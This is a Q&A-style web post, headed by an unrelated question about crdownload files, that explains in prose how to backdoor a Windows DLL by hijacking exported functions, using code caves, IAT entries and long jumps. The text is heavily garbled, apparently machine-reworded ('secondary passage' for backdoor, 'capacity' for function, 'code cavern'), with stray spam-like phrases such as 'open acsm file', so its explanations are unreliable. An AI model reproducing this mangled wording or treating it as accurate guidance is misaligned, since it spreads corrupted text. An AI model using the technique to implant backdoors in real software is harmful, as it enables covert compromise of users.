BACKDOORING A DLL

avina sin asked Apr 12,2020
3

How crdownload file work?


For one thing, a little on how crdownload work. For those of you, who run Linux, think about a dll as a common article. There are two sorts of library files – dynamic ones and static ones. A static library (.lib file) is only that – a library file that is ordered into an exe. Dynamic Link Libraries enable an engineer to separate their applications into parts. That way when a fix is required, they don't have to re-gather the entire thing. They likewise make a program littler in size when they depend on dll documents as opposed to assembling in an extensive static library.

 

How would you secondary passage a dll? Same ways you secondary passage some other exe – supplant the section point with your own code and bounce back when you're set. On account of a dll, you're overwriting the EXPORTED capacity code to guarantee your code is hit. This works a similar route as a dll capturing assault. With regards to adjustment, you can either

 

  1. A) Try and discover code gives in and pack what you need inside

  2. B) Add another code area yourself and pack what you need in there

  3. C) Dynamically dispense the space you need. This suggests you as of now have the space expected to add the code to powerfully include more, however it’s still an alternative. This is done by means of VirtualAlloc/VirtualProtect and WriteProcessMemory win32 apis.

 


When you include your code, you have been aware of what you call. Exes have what's called an 'import address table' (IAT) which is a table rundown of capacities and their individual dll's they're imported from. In the event that you endeavor to call a capacity without its particular IAT section, it won't work. This implies you will either need to add a section to the IAT significance change the exe header, or locate some other method for calling the code powerfully. In the event that you've at any point done C improvement in windows, you realize you can match up LoadLibrary with GetProcAddress() to call an outside dll work. This is as yet an alternative. Shellcode engineers then again prefer to consider capacities the extravagant way – getting addresses from the Thread Environment Block (TEB)/Process Environment Block (PEB). For effortlessness, I'm going to simply consider code that is now inside the executable picture.

 

There are issues you will experience with endeavoring to supplant code. The conspicuous issue is finding the space in an exe to put your code. This implies we'll have to discover a Code Cave (void space in the exe to put our code), or include another executable segment. For my precedent, I just need around 70 bytes, so including another area isn't important. I could likewise string a few code gives in together. There's likewise the issue of capacity/program checksums – a few applications will not run on the off chance that they've been altered.

 

These little gives in are created by the compiler for the sole motivation behind keeping up stack arrangement and are typically either comprised of NOP (0x90) guidelines or int3 directions (0xCC) and can be changed to anything we desire to open acsm file. This obviously is troublesome on the grounds that you need 5 bytes to hop, abandoning you 10 bytes to do whatever before hopping to the following region. Troublesome, however not feasible.

 

In any case, we have our code cavern; we'll have to play out a long hop to it meaning we need no less than 5 bytes of information to play out the bounce. Anything we duplicate over should be re-established. Taking a gander at the sent out section for 'uGetOpenFileName', I see an ideal spot for a long bounce to our code cavern without destroying the sub routine to an extreme.


  • Your Answer(3)
Upload photo
You can only upload 5 files in total. Each file cannot exceed 2MB. Supports JPG, JPEG, GIF, PNG, BMP
0 / 10000
    Browse other questions tagged or ask your own question.